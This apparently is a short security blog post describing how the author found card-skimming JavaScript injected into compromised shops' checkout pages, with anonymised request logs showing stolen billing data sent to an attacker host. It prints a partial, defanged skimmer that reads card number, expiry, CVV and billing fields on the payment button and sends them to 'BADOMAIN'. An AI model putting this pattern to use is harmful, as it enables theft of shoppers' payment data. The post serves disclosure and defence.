One day I noticed log lines like this:

[+] Request: http://BADOMAIN/l.php?
  [+] Referer: https://VICTIMDOMAIN/process.html
  [+] UserAgent: Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1
[+] Request: http://BADOMAIN/vap.php?data=jim%20smith101th.%20avenue%7C%7C%09%09%09CITY%09%09%09NY%09%09%0912182
  [+] Referer: https://VICTIMDOMAIN/checkout/onepage/
  [+] UserAgent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1

Note: I’ve intentionally changed and obscured all of the real values, but you can still get a good sense of the issue.

I started digging into those checkout pages (the Referer locations), and if you go through the checkout flow on those sites, and then search the page source code you’ll find the following:

function time(){
if(window.location.href.indexOf('payment') > -1)
var my = get_submit_button();
my.onmousedown = function(e) {
var i = document.createElement("img");
i.src = ")/g'>hXXps://BADOMAIN/vap.php?data="+encodeURIComponent(document.getElementById('networkmerchants_cc_number' \
).value+"|"+document.getElementById('networkmerchants_expiration').value+"|"+document.getElementById('networkmerchants_expiration_yr') \ 
.value+"|"+document.getElementById('networkmerchants_cc_cid').value+"|"+document.getElementsByClassName("billing-information") \
)/g, '|'));

These websites have been compromised via some vector (unclear what), and are infected with this JS code that is scraping, stealing, and then exfiltrating the credit card and billing information for their customers.

That is bad.